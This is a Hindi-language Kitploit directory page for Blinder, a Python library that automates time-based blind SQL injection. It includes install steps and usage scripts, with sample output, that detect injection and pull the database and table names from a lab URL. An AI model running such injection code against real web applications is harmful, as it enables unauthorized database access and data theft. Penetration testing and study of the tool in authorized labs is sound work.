Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blinder — टाइम-आधारित ब्लाइंड SQL इंजेक्शन को स्वचालित करने के लिए एक पायथन लाइब्रेरी | Kitploit
उपकरण/GitHubGitHub/mhaskar/blinder
भेद्यता विश्लेषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubmhaskar/blinder

Blinder

टाइम-आधारित ब्लाइंड SQL इंजेक्शन को स्वचालित करने के लिए एक पायथन लाइब्रेरी

रिपॉजिटरी देखें
50156 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Blinder

Blidner एक छोटी पायथन लाइब्रेरी है जो समय-आधारित ब्लाइंड SQL इंजेक्शन को स्वचालित करने के लिए पूर्व-निर्धारित क्वेरीज़ को फंक्शंस के रूप में उपयोग करके तीव्र PoC विकास को स्वचालित करती है।

स्थापना

आप निम्नलिखित कमांड का उपयोग करके Blinder स्थापित कर सकते हैं:

pip install blinder

या स्रोत डाउनलोड करके और इसे मैन्युअल रूप से अपने प्रोजेक्ट में आयात करके।

उपयोग

Blinder का उपयोग करने के लिए आपको Blinder मॉड्यूल आयात करना होगा, फिर Blinder के मुख्य फंक्शंस का उपयोग शुरू करें।

आप Blinder का उपयोग (वर्तमान संस्करण के साथ) निम्नलिखित कार्यों के लिए कर सकते हैं:

  • समय-आधारित इंजेक्शन की जाँच करें।
  • डेटाबेस का नाम प्राप्त करें।
  • तालिकाओं के नाम प्राप्त करें।

आप निम्नलिखित कोड का उपयोग करके URL में इंजेक्शन की जाँच कर सकते हैं:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

निष्पादन का परिणाम होगा:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

आप निम्नलिखित कोड का उपयोग करके डेटाबेस का नाम प्राप्त कर सकते हैं:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

और परिणाम होंगे:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

तालिकाओं के नाम प्राप्त करने के लिए आप निम्नलिखित कोड का उपयोग कर सकते हैं:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

और परिणाम होंगे:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

जल्द ही कई सुविधाएँ जोड़ी जानी चाहिए जैसे:

  • अनुकूलित क्वेरी जोड़ने की क्षमता
  • बर्प अनुरोध के आधार पर इंजेक्शन बिंदुओं का परीक्षण
  • तालिकाओं/स्तंभों का डेटा निकालना
टूल डाउनलोड करें